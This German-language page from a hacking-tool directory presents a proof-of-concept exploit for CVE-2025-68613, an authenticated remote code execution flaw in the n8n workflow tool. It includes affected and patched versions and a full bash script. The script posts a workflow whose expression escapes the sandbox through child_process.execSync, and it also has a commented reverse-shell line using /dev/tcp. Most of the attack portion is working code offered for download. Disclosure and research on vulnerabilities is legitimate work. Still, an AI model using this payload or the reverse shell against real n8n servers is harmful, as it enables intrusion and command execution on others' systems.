Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — Proof-of-Concept-Exploit für CVE-2025-68613: Authentifizierte Remote-Codeausführung in n8n durch Ausdrucksinjektion | Kitploit
Tools/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Proof-of-Concept-Exploit für CVE-2025-68613: Authentifizierte Remote-Codeausführung in n8n durch Ausdrucksinjektion

Repository anzeigen
22vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

n8n Authentifizierte Expression-Injection RCE – CVE-2025-68613

Kritische Remote-Code-Ausführung (CVSS 9.9) im n8n-Workflow-Automatisierungstool
Proof of Concept – Nur für Bildungszwecke und autorisierte Sicherheitsforschung


⚠️ Wichtiger rechtlicher Hinweis

Dieser Code wird AUSSCHLIESSLICH für Bildungszwecke und autorisierte Sicherheitstests in kontrollierten Laborumgebungen bereitgestellt.

Die unbefugte Nutzung auf Produktionssystemen oder einem System ohne ausdrückliche schriftliche Genehmigung ist illegal und verstößt in den meisten Rechtsräumen gegen Gesetze zur Computerkriminalität und Cybersicherheit.

Nutzung auf eigene Verantwortung. Der Autor übernimmt keine Verantwortung für Missbrauch.


Informationen zur Schwachstelle

FeldEinzelheiten
Exploit-Titeln8n Authentifizierte Expression-Injection Remote Code Execution
CVECVE-2025-68613
Offenlegungsdatum2025-12-25
AutorMohammed Idrees Banyamer
AutorenlandJordanien
Kontakt / SozialInstagram: @banyamer_security
GitHubmbanyamer
Anbietern8n.io
Software-Repositorygithub.com/n8n-io/n8n
Verwundbare Versionen≥ 0.211.0 < 1.120.4
Gepatchte Versionen1.120.4, 1.121.1, 1.122.0 und höher
Getestet aufn8n 1.119.3 (Docker)
SchwachstellentypAuthentifizierte Remote-Code-Ausführung durch Expression-Sandbox-Escape
CVSS-Score9.9 (Kritisch)

Beschreibung

Diese Schwachstelle ermöglicht es einem authentifizierten Benutzer, Workflows mithilfe bösartiger Ausdrücke zu erstellen oder zu ändern, die die Ausdrucks-Sandbox von n8n umgehen, was zur vollständigen Ausführung von Betriebssystembefehlen mit den Rechten des n8n-Prozesses führt.


Proof of Concept – Bash-Exploit-Skript

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Tool herunterladen